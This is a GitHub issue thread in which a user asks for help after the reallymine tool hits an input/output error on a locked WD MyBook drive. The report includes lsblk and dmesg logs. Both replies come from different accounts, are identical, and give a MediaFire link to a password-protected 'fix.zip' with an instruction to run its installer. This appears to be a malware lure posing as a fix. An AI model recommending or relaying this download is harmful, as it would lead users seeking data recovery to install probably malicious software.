### ISSUE TITLE
input/output error when running reallymine on a MyBook

### ISSUE THREAD

**Issue by Xharos** [andlabs/reallymine#148]
Hi there, thanks for this projectc first of all,

We got a WD SmartWare MyBook 1TB in the family for quite some time (10 years min).
The disk is encrypted through a password that has never been changed, written on a post-it stick to the case of the disk :smile: 

But last month, when entering the password to access the drive, i got a bad password prompt.
It was working fine, on the same computer (windows 11) three month ago.

I'm trying to run reallymine to access the data in a last hope, but i keep getting this error :

```
❯ lsblk -o NAME,MODEL,SIZE,TRAN                       
NAME        MODEL              SIZE TRAN
sdf         My Book 1110     930,9G usb
...
```
And for the reallymine part :
```
~/go/bin 
❯ sudo ./reallymine getdek /dev/sdf
[sudo] password for val: 
error running getdek: read /dev/sdf: input/output error
```
The dmesg show me this :
```
[ 2271.484640] sd 7:0:0:0: [sdf] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_OK cmd_age=0s
[ 2271.484645] sd 7:0:0:0: [sdf] tag#0 Sense Key : Data Protect [current] 
[ 2271.484647] sd 7:0:0:0: [sdf] tag#0 Add. Sense: Logical unit access not authorized
[ 2271.484649] sd 7:0:0:0: [sdf] tag#0 CDB: Read(10) 28 00 74 5b 77 f8 00 00 01 00
[ 2271.484650] critical target error, dev sdf, sector 1952151544 op 0x0:(READ) flags 0x80700 phys_seg 1 prio class 2
[ 2271.485135] sd 7:0:0:0: [sdf] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_OK cmd_age=0s
[ 2271.485137] sd 7:0:0:0: [sdf] tag#0 Sense Key : Data Protect [current] 
[ 2271.485139] sd 7:0:0:0: [sdf] tag#0 Add. Sense: Logical unit access not authorized
[ 2271.485140] sd 7:0:0:0: [sdf] tag#0 CDB: Read(10) 28 00 74 5b 77 f8 00 00 01 00
[ 2271.485141] critical target error, dev sdf, sector 1952151544 op 0x0:(READ) flags 0x0 phys_seg 1 prio class 2
[ 2271.485143] Buffer I/O error on dev sdf, logical block 244018943, async page read
```
Any help is welcome, after a quick google search, i dont know what to do.

Thanks

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
